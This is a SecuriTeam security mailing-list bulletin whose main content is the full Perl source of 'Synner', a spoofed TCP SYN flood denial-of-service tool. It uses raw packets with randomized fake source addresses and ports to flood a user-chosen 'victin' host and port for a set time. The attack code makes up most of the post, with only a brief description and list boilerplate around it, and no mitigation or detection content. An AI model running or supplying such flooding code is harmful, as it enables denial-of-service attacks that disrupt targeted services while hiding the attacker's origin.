[TOOL] Synner - Spoof-DoS Tool

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Synner - Spoof-DoS Tool
------------------------------------------------------------------------


SUMMARY



DETAILS

This is a small tool is similar many other TCP SYN flooders out there. It 
works by sending TCP SYN packets to destination host:port, spoofing its 
own IP addresses by sending random source host:port packets.

Tool Source:
#!/usr/bin/perl
#
# Synner.pl
#
# Other Spoof-DoS tool written by nuTshell
# <carloslack at gmail dot com>
# <http://gotfault.net/~nutshell>
#
# Description:
# This small tool is similar many other tcp syn flooders out there.
# It works sending syn tcp packets to destination host:port,
# spoofing it`s own ip addresses by sending randon source host:port
# packets.
# Be carefull, becouse you really need strong link otherwise
# you`ll get f*. Unlike panic.pl , synner.pl consumes much
# bandwidth resources.
#
# Required:
# Install Net::RawIP from cpan or get it`s .tar,gz from somewhere.
# It`s up to you.
#
# This tool does SPOOF your ip.
#
# Run it as ROOT (Net::RawIP needs).
# Usage: ./synner.pl <ip> <port> <time>
#
# Greetz goes to: Shorgen, hexdump, Codak, khz, spidersoft,
#                 Barros, xgc, btaranto, Acid-Warz, F-117...
#
# WARNING: Never tested in real world :}
#

#Make sure to get and install this module from cpan:
use Net::RawIP;

#Display help message:
sub usage() {
    die "Use $0 <ip> <port> <time>\n";
}

#Function to control synner`s execution time:
sub get_time() {
    $finaltime = time;
    $endme = $finaltime-$begintime;
}

#Bit useless...:
if (@ARGV>3) {&usage}

$ipdest = $ARGV[0] or &usage;
$destport = $ARGV[1] or &usage;

#Time is required to avoid endless execution (keep in mind that synner 
eats bandwidth):
$time = $ARGV[2] or &usage;

#Source port of our packets, include as many as you want:
@tmpport = 
(1756,1026,1739,4055,2001,3055,1999,2873,20000,5476,9132,6000,9000,1234);

#2 arrays that will give us randon ip addr:
@iparray_round1 = (1,2);
@iparray_round2 = (0,1,2,3,4,5,6,7,8,9);

print "[!] Synpack.pl spoof-DoS tool written by nuTshell\n";
print "[!] You better have huge link :)\n";
print "[!] Time: $time\n";
print "[!] Destination victin-> $ipdest:$destport\n";

#Set $packet as handle of our raw packets:
$packet = new Net::RawIP;

#Get start time:
$begintime = $^T;

#Call get_time():
get_time();

while($endme < $time) {

#Now build randon xxx.xxx.xxx.xxx:
for ($z=0;$z<4;$z++) {

#I use number 2 for every first numbers of each octet:
for($I=0;$I<1;$I++) {
    $ip .= 2;
}
#Here i keep two options for every second numbers of each octet:
for($kick=0;$kick<1;$kick++) {
    $iparray_round1 = $iparray_round1[rand(@iparray_round1)] ;
    $ip .= $iparray_round1;
}
#For all the last third of each octets i use range between 0<->9:
for($you=0;$you<1;$you++) {
    $iparray_round2 = $iparray_round2[rand(@iparray_round2)] ;
    $ip .= $iparray_round2;
}

#Insert dot between each octet:
$ip .= ".";
}

#The last one dot must be erased:
chop($ip);

#Routine to create/send spoofed packets, thanks to Net::RawIP:
$tmpport = $tmpport[rand(@tmpport)];
$packet->set(
    {
       ip => { saddr => $ip,  #Victin ip
           daddr => $ipdest #Victin port
           },
           
       tcp => { source => $tmpport, #Source ip(Spoofed and randomized)
            dest => $destport, #source port(Randomized)
            psh => 1,
            ack => 0,
            syn => 1,
            data => '31337'
           }
    }
);

#Send it:
$packet->send(0,1) ;

print "[*] From-> $ip:randon_port\r";

#Reset last ip for new one:
$ip = '';

#Call get_time():
get_time();

}
#That`s all folks!
print "\nDone!\n";
#eof


ADDITIONAL INFORMATION

The information has been provided by  <mailto:carloslack@gmail.com> Carlos 
Carvalho.
To keep updated with the tool visit the project's homepage at:  
<http://gotfault.net/~nutshell/tools/synner/synner.html> 
http://gotfault.net/~nutshell/tools/synner/synner.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.